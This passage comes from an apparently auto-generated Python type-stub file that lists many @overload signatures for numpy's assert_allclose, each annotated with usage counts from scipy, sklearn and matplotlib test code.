actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=1"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=2"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=3"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=4"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=5"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=6"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=7"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=8"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=9"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=1 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=2 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=2 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=3 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=3 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=3 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=4 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=4 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=4 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=4 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=5 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=5 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=5 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=5 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=5 k=4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=6"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=6"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=7"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=6"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=7"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=8"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, atol: float, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[int]):
"""
usage.matplotlib: 4
usage.scipy: 68
usage.sklearn: 9
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.ndarray, rtol: float, atol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.float64]):
"""
usage.scipy: 4
usage.sklearn: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["None"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(0, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(0, 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(1, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(2, 3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(9, 2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(0, 0, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(0, 1, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(1, 0, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(2, 3, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(6, 0, 2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["[(0, 1), (0, 1)]"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["[(0, 0.5), (0, 1)]"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["[(0, 1), (0, 0.5)]"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: float, rtol: float, atol: float, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["nearest"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["linear"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["splinef2d"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.matrix, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('nearest', True)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('nearest', False)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('linear', True)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('linear', False)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('cubic', True)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('cubic', False)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["nearest"],
):
"""
usage.scipy: 10
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["linear"],
):
"""
usage.scipy: 7
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["cubic"],
):
"""
usage.scipy: 7
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["cubic"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[Union[int, complex]], desired: numpy.ndarray):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: List[Union[complex, int]], desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.float64, rtol: float, atol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.float64, rtol: float, atol: float
):
"""
usage.scipy: 11
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.complex128, desired: numpy.complex128, rtol: float, atol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: complex, rtol: float, atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.float32, desired: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Union[float, int]]):
"""
usage.matplotlib: 2
usage.scipy: 15
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: complex, desired: numpy.complex128, rtol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsd"],
):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelss"],
):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: None"],
):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: numpy.float32,
desired: numpy.float32,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsd"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsd"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float32,
desired: numpy.float32,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelss"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelss"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float32,
desired: numpy.float32,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float32,
desired: numpy.float32,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: None"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: None"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsd"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelss"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: None"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float128,
desired: numpy.float64,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsd"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float128,
desired: numpy.float64,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelss"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float128,
desired: numpy.float128,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float128,
desired: numpy.float64,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: None"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[complex, complex],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsd"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[complex, complex],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelss"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float32,
desired: numpy.complex64,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[complex, complex],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[complex, complex],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: None"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.complex128,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float128,
desired: numpy.complex256,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsd"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelss"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: None"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.float16, desired: numpy.float64, rtol: numpy.float64):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float64, rtol: numpy.float64):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: numpy.float128, desired: numpy.float64, rtol: float):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[float]]):
"""
usage.scipy: 2
usage.sklearn: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[List[float]]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: int, desired: int):
"""
usage.scipy: 2
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, atol: numpy.float64):
"""
usage.scipy: 81
"""
...
@overload
def assert_allclose(actual: complex, desired: complex, rtol: int):
"""
usage.scipy: 8
"""
...
@overload
def assert_allclose(actual: float, desired: float, rtol: int):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(actual: numpy.complex128, desired: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: int, rtol: float, atol: float, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, err_msg: str):
"""
usage.scipy: 28
usage.sklearn: 38
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: float, rtol: float, atol: numpy.float64
):
"""
usage.scipy: 6
"""
...
@overload
def assert_allclose(actual: List[Union[int, float]], desired: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: List[Union[float, int]], desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[complex], desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[float], desired: numpy.ndarray):
"""
usage.scipy: 11
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.float32, atol: numpy.float64):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.float64, atol: numpy.float64):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.complex64, atol: numpy.float64
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.complex128, atol: numpy.float64
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, atol: numpy.float64):
"""
usage.scipy: 11
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[float], atol: float):
"""
usage.scipy: 18
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float, rtol: float):
"""
usage.scipy: 17
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[Union[int, float]], atol: float
):
"""
usage.scipy: 5
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: int, atol: numpy.float64
):
"""
usage.scipy: 5
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, rtol: float, err_msg: str
):
"""
usage.scipy: 12
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[int]], atol: float):
"""
usage.scipy: 6
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[int]], atol: numpy.float64
):
"""
usage.scipy: 10
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[Union[int, complex]]], atol: numpy.float64
):
"""
usage.scipy: 10
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[Union[complex, int]]], atol: numpy.float64
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, rtol: numpy.float64):
"""
usage.scipy: 32
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: numpy.float64,
atol: numpy.float64,
):
"""
usage.scipy: 12
"""
...
@overload
def assert_allclose(actual: complex, desired: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: complex, desired: complex):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray], desired: List[List[int]], atol: float
):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[int], atol: float):
"""
usage.scipy: 21
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray],
desired: List[List[Union[int, complex]]],
atol: float,
):
"""
usage.scipy: 12
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[Union[int, float]]], atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[Union[complex, int]]], atol: float
):
"""
usage.scipy: 7
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[Union[complex, float, int]]], atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.complex128, desired: numpy.complex128):
"""
usage.scipy: 7
"""
...
@overload
def assert_allclose(actual: numpy.complex128, desired: complex):
"""
usage.scipy: 12
"""
...
@overload
def assert_allclose(actual: List[Union[numpy.float64, int]], desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[Union[numpy.complex128, int]], desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["#0 failed"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["#1 failed"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["#2 failed"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["#3 failed"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["#4 failed"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(actual: numpy.int64, desired: int):
"""
usage.scipy: 10
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[int, int, int, int, int, int, int, int, int, int],
atol: float,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float, float, float, float, float, float],
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[
float, float, float, float, float, float, float, float, float, float
],
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[float, float], atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[Union[float, numpy.float64]], atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.float64, rtol: float):
"""
usage.scipy: 8
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[int], rtol: float, atol: float
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: List[float], atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[float], rtol: float):
"""
usage.matplotlib: 3
usage.scipy: 49
usage.sklearn: 6
"""
...
@overload
def assert_allclose(
actual: List[float], desired: List[float], rtol: float, atol: float
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: float, desired: float, rtol: float, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: float, rtol: float, atol: float, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[int], rtol: float, atol: float, err_msg: str
):
"""
usage.scipy: 6
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: int, rtol: float, atol: float, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[float], rtol: float, atol: float, err_msg: str
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.int64, rtol: float, atol: float, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
